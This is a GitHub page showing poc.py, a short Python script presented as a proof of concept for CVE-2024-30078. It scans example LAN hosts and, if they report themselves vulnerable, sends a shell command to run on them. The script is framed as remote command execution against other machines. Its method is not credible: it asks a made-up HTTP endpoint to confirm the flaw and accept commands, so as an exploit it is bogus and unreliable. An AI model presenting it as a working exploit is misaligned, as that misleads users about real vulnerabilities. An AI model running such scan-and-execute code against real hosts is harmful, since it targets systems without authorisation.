forked from 52by/CVE-2024-30078
-
Notifications
You must be signed in to change notification settings - Fork 0
/
poc.py
60 lines (48 loc) · 1.82 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
import requests
import json
# 定义用于检测的端点和要执行的命令
ENDPOINT = "/check" # 替换为实际的端点地址
COMMAND = "pwd" # 替换为实际要执行的命令
# 函数:检测漏洞并执行命令
def check_vulnerability_and_execute(ip, port, endpoint, command):
url = f"http://{ip}:{port}{endpoint}"
# 构造用于检测漏洞的载荷
payload = {
"command": "check_vulnerability",
"cve": "CVE-2024-30078"
}
headers = {
"Content-Type": "application/json"
}
# 发送请求并接收响应
try:
response = requests.post(url, headers=headers, data=json.dumps(payload))
response.raise_for_status()
# 如果发现漏洞,尝试执行命令
if response.status_code == 200 and "\"vulnerable\": true" in response.text:
print(f"在 {ip}:{port} 检测到漏洞")
# 构造执行命令的载荷
payload_command = {
"command": command
}
# 发送执行命令的请求
exec_response = requests.post(url, headers=headers, data=json.dumps(payload_command))
if exec_response.status_code == 200:
print(f"在 {ip}:{port} 成功执行命令")
else:
print(f"在 {ip}:{port} 执行命令失败")
else:
print(f"在 {ip}:{port} 未检测到漏洞")
except requests.RequestException as e:
print(f"连接到 {ip}:{port} 失败,错误: {str(e)}")
# 示例目标列表
# 替换为实际获取目标列表的方法
targets = [
{"host": "192.168.31.1", "port": 80},
{"host": "192.168.31.2", "port": 8080}
]
# 遍历每个目标并检查漏洞
for target in targets:
ip = target["host"]
port = target["port"]
check_vulnerability_and_execute(ip, port, ENDPOINT, COMMAND)